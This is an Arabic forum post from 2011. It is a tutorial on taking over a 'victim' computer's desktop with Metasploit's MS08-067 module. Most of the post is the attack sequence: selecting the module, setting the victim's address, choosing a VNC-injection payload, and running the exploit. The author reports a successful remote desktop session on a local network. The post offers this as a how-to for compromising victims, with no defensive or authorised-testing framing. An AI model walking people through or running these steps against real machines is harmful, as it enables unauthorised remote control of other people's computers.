عرض مشاركة واحدة
قديم 03-19-2011, 04:30 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
VIURIS.SA
 
الصورة الرمزية VIURIS.SA
 

 

 
إحصائية العضو






VIURIS.SA غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
VIURIS.SA is on a distinguished road

افتراضي الإتصال بسطح مكتب الضحية


السلام عليكم ورحمة الله وبركاته

حياكم الله اخوتي الأعزاء

شرحي هو عن ثغرة رائعة جدا في نظري
على الرغم من كونها قديمة
لكنها مميزة
وهي
كود PHP:
  windows/smb/ms_08_067_netapi 





طبعا بعد فتح الميتا سبلويت واختيار الثغرة

نقوم بكتابة الأمر التالي

كود PHP:
 show options 

ومثل ما انتم شايفين يعطينا المتطلبات لهذه الثغرة
يعني البورت اللي لازم يكون مفتوح عند الضحية


تمام
نقوم يتحديد الآيبي حق الضحية من الأمر
كود PHP:
  set RHOST 
و بتحديد البايلود المستخدم في هذه العملية
هذا البايلود يتيح التحكم بسطح مكتب الضحية

كود PHP:
 set PAYLOAD windows/vncinject/bind_tcp 




العملية مطبقة في شبكة داخلية لذلك نأخذ الآيبي الداخلي لجهازنا من الأمر
كود PHP:
  set LHOST 


الآن نشيك على كل شي من الأمر
كود PHP:
 show options 

الآن كل شي تمام
نطبق بلأمر exploit





]
الحمدلله تم الإتصال
وهنا قطعت علشان طلع سطح المكتب حق جهازي :na:

أتمنى أكون قدمت المفيد لكم اخواني


الشرح إهداء لأخي القدير ALQAYSAR الذي استفدت منه كثيرا




hgYjwhg fs'p l;jf hgqpdm

التوقيع

 

   

رد مع اقتباس